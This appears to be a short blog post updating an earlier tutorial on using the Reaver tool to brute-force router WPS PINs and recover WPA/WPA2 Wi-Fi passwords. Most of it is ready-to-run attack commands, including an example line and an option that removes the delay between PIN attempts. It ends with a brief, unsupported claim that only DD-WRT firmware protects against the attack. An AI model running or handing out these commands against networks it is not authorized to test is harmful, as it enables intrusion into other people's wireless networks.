USE REAVER UTILITY TO CRACK WPA AND WPA2 PASSWORDS (UPDATE)
This is an update to the previous article on this matter. We have had quite a few feedbacks on the fact that the REAVER command that we have issued was not working for some routers/access points.
ORIGINAL COMMAND: reaver -i monitored_interface -b router_bssid -vv
If this command does not work for you, we can add the option “d 0” it. This option suppresses the delay of 1 second that REAVER has between the pin attempts.
UPDATED COMMAND: reaver -i monitored_interface -b router_bssid -vv -d 0
Example: reaver -i mon0 -b AA:BB:CC:DD:EE:FF -vv -d 0
Note:
Most of the routers/access points out there won’t like the delay suppression, so don’t use it unless the original command isn’t working for you!!
PROTECT YOURSELF AGAINST WPS/REAVER ATTACK
I have seen a lot of blogs advising people that disabling WPS on their router/access point might help protect against a WPS/REAVER attack.
(Check our post on the subject here http://wp.me/p2mBFp-34).
The truth (at least by our experience), however, is that nothing seems to be a real protection against this attack at the exception of the powerful and open source router firmware called DD-WRT.
DD-WRT, although available for a great number of routers, is not however supported on ALL routers/access points!!
Check out soon our article on how to get DD-WRT on your router and the list of supported devices!!!!!